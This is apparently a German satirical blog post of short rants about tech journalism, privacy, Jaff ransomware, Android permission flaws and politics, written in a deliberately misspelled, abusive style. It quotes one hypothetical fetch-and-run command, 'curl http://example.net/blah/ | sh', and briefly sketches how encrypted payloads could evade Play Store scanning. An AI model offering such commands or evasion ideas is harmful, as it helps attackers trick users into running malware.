Kwalitätsjornalisten erklären kompjutertechnik

Ein Gif, die Abkürzung steht für Graphics Interchange Format, ist ein meist extrem kurzes Video. Es zeigt in Dauerschleife nur einige wenige Bilder, häufig ohne Ton

Kopf-Tisch, Kopf-Tisch

via @tux@pod.geraspora.de | Dauerhafte archivversjon, damit dieses glanzstück des kwalitätsjornalismus auch niemals verloren gehe… und nein, ich glaube nicht, dass sich diese wegwerftextschreiber bei temen, von denen ich zufällig gar nichts weiß, auch nur eine spur besser auskennen als beim tema „GIF-bilder“.

Datenschutz von gesundheitsdaten des tages

Reklame einer Apotheke in einer Tageszeitung. 97% Lieferfähigkeitszugage für Stammkunden mit Rezept. Fehlende Arzneimittel werden per Bote zugestellt. JETZT NEU! Rezepte fotografieren und über WhatsApp vorbestellen...

„Rezepte fotografieren und über whatsäpp vorbestellen“ — hej leute, die ihr so eine datenschutzverachtende drexkacke von hirnlosen scheißapotekern hinnehmt und flugs eure rezepte mit dem wischofon knipst: Erich Mielke wäre ja so stolz auf euch gewesen!

Wenns internetz im händi ist, ists gehirn im arsch. Ich wünsche der generazjon fratzenbuch viel spaß dabei, auch noch die verschreibungen ihres arztes beim fratzenbuch abzuliefern — und dem apoteker, der dieses angebot allen erstes macht, wünsche ich, dass er ganz schnell den insolvenzverwalter kennenlerne! Bevor noch größerer schaden entsteht!

Sicherheitsproblem des tages

Wer auf die Mail hereinfällt und das PDF öffnet, fängt sich Jaff aber noch nicht ein. Erst muss man in der PDF-Anwendung eine Sicherheitswarnung mit einem Klick auf „OK“ abnicken. Anschließend wird ein Word-Dokument mit Makros aus dem PDF extrahiert und geöffnet. Nun muss ein Opfer noch die Makros aktivieren. Erst dann findet die Infektion mit Jaff statt

Sorry, aber wer das macht, kann auf mein mitleid nicht mehr rechnen. Nach so viel mühe hat man sich den erpressungstrojaner aber auf anständige weise selbst verdient. Bei so viel konzentriertem informazjonstechnischen analfabetismus an den tasten hilft auch das sicherste betrübssystem nicht weiter. Wenn man derartige vollpfosten etwa vor einem un*xoiden system setzt und die kriegen da eine spämm mit dem text: „unser voll sicheres sicherheitsverfahren zur erhöhung der sicherheit erfordert eine aktivierung an ihrer kommandozeile, damit sie die angehängten dokumente lesen können, bitte geben sie die anweisung curl http://example.net/blah/ | sh in einer konsole ein! Vielen dank für ihr verständnis!“ — die machen das! Und die kommen sich dabei noch wichtig und kompedingsda vor, weil sie eine tolle, sichere sicherheitszeile von hand abtippen können. (Das mit der zwischenablage werden sie wohl nicht verstehen, und dass man unter X seit rd. 25 jahren einfach mit der mittleren maustaste den woanders markierten text einfügen könnte, wissen sie auch nicht und werden sie auch nie lernen, denn sie brauchen es ja nicht zu wissen.) Die größte sicherheitslücke ist immer noch der digitale analfabet vor dem kompjuter, und dieser analfabet wird mit hohem aufwand systematisch hergestellt, weil man verdummten menschen, die angst vor eigenem wissen und können haben, einfach viel mehr zeugs verkaufen kann. Wischofone zum beispiel. Oder antivirus-schlangenöle. Oder lichtschalter mit internetz. Ach!

Nicht daten sind der rohstoff der zukunft. Dummheit ist der rohstoff der zukunft.

Ach, apropo dummheit: Warum — und vor allem wozu — im namen von drei schwefelkackenden höllenhunden kann man an ein PDF-dokument ein wörd-dokument anhängen? Was ist der intendierte anwendungsfall für dieses funkzjonsmerkmal? Und wie oft wird dieses funkzjonsmerkmal von anwendern genutzt? Wer sinnlos aufgeplusterte softwäjhr von klischen wie „adobe“ (engl. für: gebrannter lehmziegel) benutzt, setzt sich damit auch ziemlich überflüssigen risiken aus.

Ändräut-security-großalarm des jahres

Benutzt hier jemand ein wischofon mit ändräut?

Zwei App-Rechte des Android-Betriebssystems lassen sich missbrauchen, um einen universellen Keylogger zu bauen, der alles mitliest, was der Benutzer des Gerätes in die Tastatur tippt. Außerdem kann ein Angreifer sie dazu nutzen, einer bösartigen App unbeschränkte App-Rechte zu verschaffen

„Ist aber nicht weiter schlimm, weil man doch die rechte einer äpp bei der installazjon abnicken muss, da kann man ja erstmal drauf achten“, denkt da vielleicht der eine oder andere… doch, es ist so schlimm:

Da alle aus dem Play Store installierten Apps routinemäßig diese Berechtigung haben, muss der Nutzer sie nicht explizit abnicken

Denn jede äpp braucht ja die rechte, einen unsichtbaren layer über die oberfläche legen zu können. Wozu? Ach, geht einfach weiter, hier gibts nichts zu sehen! Aber immerhin, guhgell tut ja was dagegen:

Google verhindert nun allerdings, dass Apps, die sie ausnutzen, in den Play Store geladen werden

Ob es wohl einen halbwegs effizjenten test gibt, um das ausnutzen eines exploits aus dem bytekohd rauszukriegen und von einer legitimen nutzungsform zu unterscheiden? Sind ja nur ein paar hunderttausend äpps in der großen müllhalde des pläjhstohr. Und die „kreativität“ von kriminellen kann erheblich sein, wenn es darum geht, an so einer kontrolle vorbeizukommen. Denn die kriminellen leben davon.

Na ja, guhgell tut ja sonst so irre viel für die kompjutersicherheit. Zum beispiel, wenn guhgell einen exploit in anderen betrübssystemen oder anwendungen findet. Dann muss der binnen neunzig tagen gefixt werden, denn dann kommt es zur veröffentlichung. Gnadenlos. Da wird „don’t be evil“ doch sicherlich selbst auch genau so schnell ausbeutbare schwächen in seinem eigenen scheißsystem fixen, oder?

Da diese Probleme inhärent Teil des Berechtigungssystems von Android sind, kann Google sie nicht ohne weiteres beheben – obwohl die Firma bereits im August 2016 von den Forschern über die Lücken informiert wurde […] Mit der nächsten Hauptversion von Android (Android O) will man solche Angriffe dann gänzlich verhindern

Aber nein doch, für die ändräut-gutsherren von guhgell gelten da ganz andere maßstäbe. Da wird eine offene, ausbeutbare sicherheitslücke einfach eine kleine ewigkeit lang vom august des letzten jahres bis zur veröffentlichung der näxten ändräut-hauptversjon vorsätzlich und jeden anwender in gefahr bringend offen gehalten. Und unterdessen erzählen euch die leute, dass ihr mit euren scheißwischofonen eure fernkontoführung¹ machen und überall bezahlen sollt, ist ja alles voll sicher, da kann ja gar nix passieren. Und ihr glaubt denen auch noch. Hej, und denkt immer dran, dass ihr immer überall schön sichere passwörter verwendet, euch dann aber mit eurem möglicherweise für euch völlig unentdeckbar von einer trojanischen äpp gepwnten scheißwischofon anmeldet! Eine trojanische äpp, wohlgemerkt, die keine besonderen privilegjen braucht, um einen keylogger zu implementieren. Weia, was für eine riesengroße scheiße! Wie fühlt sich das an, wenn man ein betrübssystem von guhgell hat und von guhgell mit so einem planetensystemweit offenen scheuentor einfach im stich gelassen wird? Mit meikrosoft wäre das jedenfalls nicht passiert, die fixen bei ganz großen scheunentoren sogar noch ihr obsoletes windohs XP… :mrgreen:

Auch weiterhin viel spaß mit euren wischofonen, die die security-blauäugigkeit der neunziger jahre mit der technisch kompententen kriminalität der zehner jahre kombinieren! Ob euer jetzt benutztes wischofon jemals eine aktualisierung des betrübssystemes sehen wird? Fragt doch mal euren wischofon-hersteller, der euch viel lieber neue wischofone verkaufen möchte! Und dann kauft einfach ein neues! Ihr habt das geld ja, und gut für die wirtschaft ist es auch. Vielleicht kann man das neue wischofon sogar mal ein halbes jahr lang benutzen, ohne dass man dadurch zum verantwortungslosen vollidjoten wird. Und dann kommt die nächste katastrofenmeldung… 😦

Nachtrag: wie man guhgells skänn im pläjhstohr umgeht? Das ist nicht schwierig, sondern könnte ähnlich wie bei den werbebanner-klickbetrugs-trojanern gemacht werden.

Google verwendet zwar für seinen Play Store eine Technik namens Bouncer, um solche Adware aus dem Shop fern zu halten. Doch die Kiniwini-Software lädt die Malware-Funktionen offenbar erst nach, wenn die jeweilige App bereits installiert ist und sich abseits des Goolge-Shops bei ihrem Hersteller registriert hat

Wenn man aber als schadsoftwäjhr-progger überhaupt keinen internetz-zugriff machen will, dann gibts halt ein paar mitgelieferte daten (serialisierte java-objekte), die so verschlüsselt abgelegt werden, dass sie beim skänn unauffällig bleiben und die dann einfach geladen und ausgeführt werden. Und den kohd zum entschlüsseln kann man beliebig schwer analysierbar machen — was übrigens kein bisschen anders aussehen muss, als ein legitimer versuch, irgendwelche „häcks“ einer softwäjhr zu erschweren.

Je länger ich darüber nachdenke, desto unmöglicher kommt es mir vor, auszuschließen, dass diese sicherheitslücke von einer äpp im pläjhstore ausgebeutet wird. Was guhgell mit seinen skänn vorschlägt, ist eine beseitigung des problemes durch auftragen von schlangenöl statt durch ausräumen der ausbeutbaren ändräut-schwachstelle.

¹Scheißwerber sprechen von „online-banking“, weil das hipper klingt…

Kwalitätsjornalismus des tages

Ist es nicht herrlich dämlich, wie sich der norddeutsche schundfunk darüber freut, dass es jemanden gelungen ist, sich die domäjhn eines AFD-ortsverbandes zu grabschen und dort für die aufnahme von flüchtlingen zu werben. [Dauerhaft archivierte versjon…]

Was der werte jornalist im eifer seines schreibens allerdings übersehen haben dürfte: Der mensch, der das gemacht hat, ist damit ein gehöriges finanzjelles risiko eingegangen. Natürlich gehören der AFD die namensrechte für ihre partei, selbst, wenn diese nicht beim deutschen patent- und markenamt eingetragen sein sollten (was ich nicht glaube). Eine auf dem rechtsweg erzwungene herausgabe der domäjhn ist also eine verhältnismäßig sichere sache, und die streitwerte, die im markenrecht „standard“ sind, führen zusätzlich zu sehr hohen kosten. Praktisch immer ist der streitwert sexstellig.

Wer mir das nicht glaubt und auch keine lust hat, eine internetz-suchmaschine zu benutzen, kann ja mal selbst ein paar erfahrungen machen: einfach eine irreführend benannte domäjhn mit SPD, CDU oder auch mal mit „BMW“, „cocacola“, „apple“ oder „NDR“ als namensbestandteil registrieren und auf einer webseit in dieser domäjhn das gegenteil der jeweiligen reklame publizieren, damit auch wirklich etwas dagegen unternommen wird! Da stecken aber ganz schnell sehr teure briefe im briefkasten, die zwar sachlich, aber auch klar und kalt formuliert sind und mindestens die kurzfristige herausgabe der domäjhn nebst unterzeichnung einer strafbewehrten unterlassungserklärung einfordern, natürlich mit angelegter kostennote einer anvergewaltskanzlei. So weit der preiswerte weg, der das konto „nur“ mit einigen tausend øre belastet. Der teure weg geht direkt und mit sehr guten erfolgsaussichten vor gericht. Wenn es ganz schlimm wird, kommen auf den markenrechtlichen kram auch noch schadenersatzforderungen drauf, deren streitwert sich das gegenüber mit der marke mehr oder minder einfach ausdenken kann (für beschädigung der marke durch arglistig erweckten falschen eindruck und alles, was dem beauftragten anvergewalt noch alles an gründen und möglichen schäden einfällt). Selbst, wenn man damit nicht durchkommt, gibt es wegen des vorsätzlich hochgeschraubten streitwertes ordentliche juristische zusatzkosten, die für eine privatperson existenzvernichtend sein können, von einem markeninhaber hingegen sogar steuerlich abgesetzt werden können. Alle diese dinge — die jeder gestalter einer webseit im rechtsraum der bummsrepublik deutschland im hinterkopf haben muss — werden vom kwalitätsjornalisten mit seiner „lustigen story gegen die AFD“ einfach weggewischt, als ob sie gar nicht existierten.

Aber hej, der kwantitätsjornalist wollte ja nur eine lustige meldung „gegen die AFD“ schreiben, und da wird dann mal kurz die gesamte wirklichkeit des geltenden rechtes in der BRD ausgeblendet. Wenns für den domäjhngrabscher teuer wird, wird der scheißjornalist bestimmt nicht drüber berichten. Jornalisten sind eben doof wie scheiße und — durch beständige desinformazjon mit potenzjell teuren folgen — die feinde ihrer leser, zuhörer und zuschauer.

Ich wünsche dem menschen, der sich bei einer günstigen gelegenheit die domäjhn eines AFD-ortsverbandes gegriffen hat und es damit „ins fernsehen“ geschafft hat, jedenfalls eine gütliche und für ihn billigere beilegung durch einigung mit der AFD.

SPD des tages

Wie die scheiß-SPD in der BRD atomausstieg machen will… da kriegste sehnsucht nach kernkraftwerken. Das wird lustig, wenn die autos demnächst nicht mehr mit benzin fahren, sondern mit in kraftwerken verfeuerter braunkohle. Mindestens so sauber wie ein dieselmotor von VW!

(Mit jedem wahlkampf der scheiß-SPD werden ein paar hundert satiriker arbeitslos.)

Securityspezjalexperte des tages

Der securityspezjalexperte des tages ist Carsten Knop, der für die frankfurter allgemeine zeitung die ersten security-schlüsse aus dem jüngsten erpressungstrojaner mit wurmfunkzjon gezogen hat — bitte festhalten, keine getränke im mund, keine tischkanten in gebissnähe:

Der Cyberangriff auf zehntausende Computer in 150 Ländern zeigt einmal mehr, warum die Cloud vorteilhaft ist

Ich wünsche diesem vorsätzlich seine leser irreführenden securityspezjalexperten der FAZ von ganzem herzen einen trojanerbefall, der seine gesamten „cloud“-verzeichnisse verschlüsselt. 👿

Oder ist das etwa nicht vorsätzlich, und bei der FAZ schreiben nur leute über temen, von denen sie überhaupt keine ahnung haben? Das wäre aber bitter für die zukunft des scheißblattes. Einfach verrecken gehen, scheißjornallje! [Danke, @tux@pod.geraspora.de für diese spontane ablage meiner hand im gesichte!]

Übrigens: mehrere jornalistische produkte haben längere texte darüber geschrieben, wie man sich davor schützen kann, von einem trojaner wie „wannacry“ befallen zu werden. Eines haben die kwalitätsjornalisten allerdings dabei nie geschrieben: dass man einen adblocker einsetzen sollte, um vor dem schadsoftwäjhrtransport durch verseuchte webreklame gefeit zu sein. Sogar das BSI macht das mittlerweile deutlich genug. Scheißjornalisten gefährden nämlich lieber ihre leser als ihr geschäftsmodell. [Danke, S.S., für den hinweis!]

Kennt ihr den schon?

Der opera-brauser für ändräut ist voll datensparsam, antiträcking, privatsfäre und so mit seinem eingebauten adblocker… und transportiert selbst träckende ads in der äpp. 😳

Überall, wohin man nur schaut: angebote für die generazjon jamba auf dem weg in die idiocracy.

Bildschirmfoto via unixstickers@twitter.com, hinweis via @benediktg5@twitter.com.

Szenen aus der nicht rassistischen BRD…

Beim „queerzinefest“ sitzt jemand am Eingang und kontrolliert Frisuren und Hautfarbe der Gäste

Tja, wenn man versucht, immer das gegenteil des faschisten zu sein, wird man eben nicht zu einem antifaschisten, sondern zu einem spiegelbild des faschisten. (Siehe auch hier…)

GNU des tages

WARNING, CLUSTERFUCK AHEAD!

Programmiert hier jemand in C++ und benutzt die libstdc++ von GNU und hat komische speicherlecks? Oder benutzt hier jemand einen modernen desktop und wundert sich, dass das dingens immer langsamer und plattenkratziger wird, wenn man es mal ein paar tage laufen lässt? Oder verwendet hier jemand eine in C++ geschriebene anwendung mit ganz großem speicherhunger?

The GNU C++ Library is Broken

Es ist etwas länger, aber die lektüre lohnt sich… auch, weil jeder mal bemerken kann, wie viel kopfschmerz so eine scheiße verursachen kann. Das beschriebene problem mit dem speicherleck in der libstdc++ dürfte (in geringerem maße) beinahe jeden menschen betreffen, der eine gegen die GNU-biblioteken gelinkte, in C++ geschriebene softwäjhr verwendet.

Via Fefe

Fefe des tages

Ich sage erstmal nichts: das frühstück vom januar

Was zum hackenden henker! Immerhin wird mir so langsam klar, warum ein verfickter grafikkartentreiber für meikrosoft windohs mehr megabytes als ein ganzes, voll arbeitsfähiges linux-betrübssystem — natürlich mit treibern — auf die systemplatte installieren will: weil da dermaßen viel sinnlose, für die funkzjon nicht erforderliche und aufgeblähte kackscheiße mit reingepackt wird, die dann auch noch probleme für die kompjutersicherheit verursacht. Auch weiterhin viel spaß mit den beglückungsideen, die sich werber, spämmer und kompetenzgranaten immer wieder für anwender von meikrosoft windohs einfallen lassen, und zwar nur für die anwender von meikrosoft windohs…

Berliner problemlösung des tages

In berlin verschimmeln die schulen. In berlin verrottet die infrastruktur. In berlin gibt es straßen in einem zustand, als wäre der zweite weltkrieg erst vor ein paar wochen beendet worden. In berlin ist die s-bahn glückssache. Da muss die amtierende berliner regierung doch unbedingt mal ein p’litisches programm vorantreiben, das einen ruck durch das reichshauptslum gehen lässt. Und in der tat, wo die macht ist, lassen die beglückungsideen nicht auf sich warten:

Berlin plant Vorstoß im Bundesrat für gendergerechte Verkehrsschilder. Aus „Verkehrshelfer“ wird „Verkehrshelfende“

Bei solchen handelnden in der p’litik_in mit derartigen schwerpunkt_innen kann es ja nur beschleunigt nach vorne gehen! Huch, da kommt ein abgrund? Egal! :mrgreen:

Hej, berliner verkehrsschildgerechtmacher! Ist euch eigentlich schon einmal aufgefallen, dass die piktogramme auf den verkehrsschildern gar nicht gendergerecht sind? Nehmt zum beispiel mal das zeichen 123, arbeitsstelle, das eine_n mit schaufel_in bewaffnet_e bauhelfer_in bei maschinell nicht unterstützten erdaushubarbeiten zeigt. Der, die oder das arbeitende trägt noch gar keinen absurden rock wie die kindesentwicklungsverhinderin auf zeichen 239, sondern darf so richtig prolle genderungerecht ein mann sein! Das könnt ihr doch nicht so lassen! Oder wollt ihr etwa diesen fiesen maskunazis recht geben, die immer wieder davon sprechen, dass sich männer in körperlich zersetzenden arbeiten kaputt machen können, während frauen mit dem goldenen förderungslöffel im munde geboren werden und fern von jeder verschleißenden arbeit überall bevorzugt werden? Das könnt ihr doch nicht wollen, oder?

(Wer meint, dass das absurd klingt: hier in hannover gab es vor ein paar jahren mal eine dieser provinzpossen, weil das fahrrad, das als sinnbild auf radwegen markiert ist, ein herrenrad ist — und es wurden ein paar damenräder auf die radwege gemalt. Diese sind aber gar nicht in den abbildungen zur straßenverkehrsordnung als sinnbild des radverkehrs vorgesehen und könnten mit dem sinnbild für ein mofa verwexelt werden… wisst schon, tolle taten und viele bedeutungsschwere worte von gerechtigkeit und sichtbarkeit der frau, großer sturm in der provinzpresse und in den wassergläsern des bau- und verkehrsausschusses, ein paar jahre später kam das in der straßenverkehrsordnung vorgesehene symbol wieder überall zurück und niemanden hats mehr gestört, nachdem genug gras über die superhyperwichtige „diskussjon“ gewaxen ist. Übrigens verschimmeln auch hier in hannover die schulen. Immer noch. P’litik heißt: mit dem schlimmsten überleben! Jornalismus heißt: jeden tag ins gehirn gefickt werden, damit man glaubt, p’litik löse existierende probleme, statt sie künstlich zu schaffen. Immerhin funkzjoniert in hannover im gegensatz zum reichshauptslum der nahverkehr recht gut…)

Ich wünsche allen menschen und menschinnen noch viel spaß in der idiocracy! Könnt ja schon mal anfangen, eure äcker mit isotonischen drinks zu bewässern!

Bundesnetzagentur des tages

Schönen gruß mit facepalm aus neuland!

Was passiert eigentlich einer russischen unternehmung, die eine softwäjhr für das XMPP-protokoll programmiert und vertreibt? Nun, die bekommt irgendwann einen sackpost-brief der bundesnetzagentur, dass sie den kommunikazjonsdienst ihres unternehmens gefälligst mal melden soll, schön deutsch mit formular und fristsetzung in typischer behördensprache.

Wer es immer noch nicht versteht: Das ist, als würde man eine mäjhlsoftwäjr wie thunderbird für einen diensteanbieter halten, weil darüber mit mäjhl kommuniziert werden kann. Was mäjhl ist, hat allerdings sogar die bummsnetzagentur verstanden.

Kwelle des fotos: @Xabber_XMPP@twitter.com — und wer englisch kann, hat dort eine menge zum lachen. 😀

Kurz verlinkt

Ist ein bisschen technischer und beschreibt, was man mit den spezjalexperten erleben kann, die bei meikrosoft einen kostenlosen mäjhldienst machen:

Aus dem Rechenzentrum
Warum man mit Hotmail keinen Ärger haben möchte

Benutzt überhaupt noch jemand (also jemand anders als spämmer) eine mäjhladresse bei „hotmail“? Ich habe die seit vielen jahren nur in spämm gesehen.

via @benediktg@gnusocial.de